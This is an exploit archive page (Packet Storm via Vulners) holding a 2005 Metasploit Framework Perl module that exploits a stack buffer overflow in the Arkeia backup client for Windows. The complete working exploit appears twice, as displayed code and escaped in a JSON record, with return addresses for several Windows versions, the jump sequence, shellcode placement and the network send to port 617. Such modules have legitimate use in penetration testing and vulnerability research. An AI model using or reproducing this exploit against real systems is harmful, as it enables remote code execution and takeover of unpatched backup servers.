Search...

arkeia_type77_win32.pm

2005-02-25T00:00:00

ID PACKETSTORM:36230
Type packetstorm
Reporter H D Moore
Modified 2005-02-25T00:00:00

Description

                                        
                                            `##  
# This file is part of the Metasploit Framework and may be redistributed  
# according to the licenses defined in the Authors field below. In the  
# case of an unknown or missing license, this file defaults to the same  
# license as the core Framework (dual GPLv2 and Artistic). The latest  
# version of the Framework can always be obtained from metasploit.com.  
##  
  
package Msf::Exploit::arkeia_type77_win32;  
use base "Msf::Exploit";  
use strict;  
use Pex::Text;  
  
my $advanced = { };  
  
my $info =  
{  
'Name' =&gt; 'Arkeia Backup Client Type 77 Overflow (win32)',  
'Version' =&gt; '$Revision: 1.1 $',  
'Authors' =&gt; [ 'H D Moore &lt;hdm [at] metasploit.com&gt;' ],  
'Arch' =&gt; [ 'x86' ],  
'OS' =&gt; [ 'win32'],  
'Priv' =&gt; 1,  
'AutoOpts' =&gt; { 'EXITFUNC' =&gt; 'process' },  
  
'UserOpts' =&gt;   
{  
'RHOST' =&gt; [1, 'ADDR', 'The target address'],  
'RPORT' =&gt; [1, 'PORT', 'The target port', 617],  
},  
  
'Payload' =&gt;   
{  
'Space' =&gt; 1000,  
'BadChars' =&gt; "\x00",  
'PrependEncoder' =&gt; "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500   
'Keys' =&gt; ['+ws2ord'],  
},  
  
'Description' =&gt; Pex::Text::Freeform(qq{  
This module exploits a stack overflow in the Arkeia backup  
client for the Windows platform. This vulnerability affects  
all versions up to and including 5.3.3.   
}),  
  
'Refs' =&gt;   
[  
['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],  
],  
  
'Targets' =&gt;   
[  
['Arkeia 5.3.3 Windows (All)', 0x004083aa ], # arkeiad.exe  
['Windows 2000 English', 0x75022ac4 ], # ws2help.dll  
['Windows XP English SP0/SP1', 0x71aa32ad ], # ws2help.dll  
['Windows NT 4.0 SP4/SP5/SP6', 0x77681799 ], # ws2help.dll  
],  
  
'Keys' =&gt; ['arkeia'],  
};  
  
sub new {  
my $class = shift;  
my $self = $class-&gt;SUPER::new({'Info' =&gt; $info, 'Advanced' =&gt; $advanced}, @_);  
return($self);  
}  
  
sub Exploit {  
my $self = shift;  
my $target_host = $self-&gt;GetVar('RHOST');  
my $target_port = $self-&gt;GetVar('RPORT');  
my $target_idx = $self-&gt;GetVar('TARGET');  
my $shellcode = $self-&gt;GetVar('EncodedPayload')-&gt;Payload;  
my $target = $self-&gt;Targets-&gt;[$target_idx];  
  
$self-&gt;PrintLine("[*] Attempting to exploit target " . $target-&gt;[0]);  
  
my $s = Msf::Socket::Tcp-&gt;new  
(  
'PeerAddr' =&gt; $target_host,  
'PeerPort' =&gt; $target_port,  
);  
  
if ($s-&gt;IsError) {  
$self-&gt;PrintLine('[*] Error creating socket: ' . $s-&gt;GetError);  
return;  
}  
  
my $head = "\x00\x4d\x00\x03\x00\x01\xff\xff";  
my $poof = Pex::Text::EnglishText(4096);  
  
# Configure the length value of the data in the packet header  
substr($head, 6, 2, pack('n', length($poof)));  
  
# The return address is a pop/pop/ret in the executable or system lib  
substr($poof, 1176, 4, pack('V', $target-&gt;[1]));  
  
# The pop/pop/ret takes us here, jump back five bytes  
substr($poof, 1172, 2, "\xeb\xf9");  
  
# Jump all the way back to our shellcode  
substr($poof, 1167, 5, "\xe9".pack('V', -1172));  
  
# Place our shellcode in the beginning of the request  
substr($poof, 0, length($shellcode), $shellcode);   
  
$self-&gt;PrintLine("[*] Sending " .length($poof) . " bytes to remote host.");  
$s-&gt;Send($head);  
$s-&gt;Send($poof);  
  
# Takes a few seconds for the payload to pop (multiple exceptions)  
$s-&gt;Recv(-1, 10);  
  
return;  
}  
  
1;  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:36230", "type": "packetstorm", "bulletinFamily": "exploit", "title": "arkeia_type77_win32.pm", "description": "", "published": "2005-02-25T00:00:00", "modified": "2005-02-25T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/36230/arkeia_type77_win32.pm.html", "reporter": "H D Moore", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:20:48", "viewCount": 1, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:20:48", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:48", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/36230/arkeia_type77_win32.pm", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be redistributed \n# according to the licenses defined in the Authors field below. In the \n# case of an unknown or missing license, this file defaults to the same \n# license as the core Framework (dual GPLv2 and Artistic). The latest \n# version of the Framework can always be obtained from metasploit.com. \n## \n \npackage Msf::Exploit::arkeia_type77_win32; \nuse base \"Msf::Exploit\"; \nuse strict; \nuse Pex::Text; \n \nmy $advanced = { }; \n \nmy $info = \n{ \n'Name' => 'Arkeia Backup Client Type 77 Overflow (win32)', \n'Version' => '$Revision: 1.1 $', \n'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ], \n'Arch' => [ 'x86' ], \n'OS' => [ 'win32'], \n'Priv' => 1, \n'AutoOpts' => { 'EXITFUNC' => 'process' }, \n \n'UserOpts' => \n{ \n'RHOST' => [1, 'ADDR', 'The target address'], \n'RPORT' => [1, 'PORT', 'The target port', 617], \n}, \n \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # add esp, -3500 \n'Keys' => ['+ws2ord'], \n}, \n \n'Description' => Pex::Text::Freeform(qq{ \nThis module exploits a stack overflow in the Arkeia backup \nclient for the Windows platform. This vulnerability affects \nall versions up to and including 5.3.3. \n}), \n \n'Refs' => \n[ \n['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'], \n], \n \n'Targets' => \n[ \n['Arkeia 5.3.3 Windows (All)', 0x004083aa ], # arkeiad.exe \n['Windows 2000 English', 0x75022ac4 ], # ws2help.dll \n['Windows XP English SP0/SP1', 0x71aa32ad ], # ws2help.dll \n['Windows NT 4.0 SP4/SP5/SP6', 0x77681799 ], # ws2help.dll \n], \n \n'Keys' => ['arkeia'], \n}; \n \nsub new { \nmy $class = shift; \nmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); \nreturn($self); \n} \n \nsub Exploit { \nmy $self = shift; \nmy $target_host = $self->GetVar('RHOST'); \nmy $target_port = $self->GetVar('RPORT'); \nmy $target_idx = $self->GetVar('TARGET'); \nmy $shellcode = $self->GetVar('EncodedPayload')->Payload; \nmy $target = $self->Targets->[$target_idx]; \n \n$self->PrintLine(\"[*] Attempting to exploit target \" . $target->[0]); \n \nmy $s = Msf::Socket::Tcp->new \n( \n'PeerAddr' => $target_host, \n'PeerPort' => $target_port, \n); \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn; \n} \n \nmy $head = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\"; \nmy $poof = Pex::Text::EnglishText(4096); \n \n# Configure the length value of the data in the packet header \nsubstr($head, 6, 2, pack('n', length($poof))); \n \n# The return address is a pop/pop/ret in the executable or system lib \nsubstr($poof, 1176, 4, pack('V', $target->[1])); \n \n# The pop/pop/ret takes us here, jump back five bytes \nsubstr($poof, 1172, 2, \"\\xeb\\xf9\"); \n \n# Jump all the way back to our shellcode \nsubstr($poof, 1167, 5, \"\\xe9\".pack('V', -1172)); \n \n# Place our shellcode in the beginning of the request \nsubstr($poof, 0, length($shellcode), $shellcode); \n \n$self->PrintLine(\"[*] Sending \" .length($poof) . \" bytes to remote host.\"); \n$s->Send($head); \n$s->Send($poof); \n \n# Takes a few seconds for the payload to pop (multiple exceptions) \n$s->Recv(-1, 10); \n \nreturn; \n} \n \n1; \n`\n", "immutableFields": []}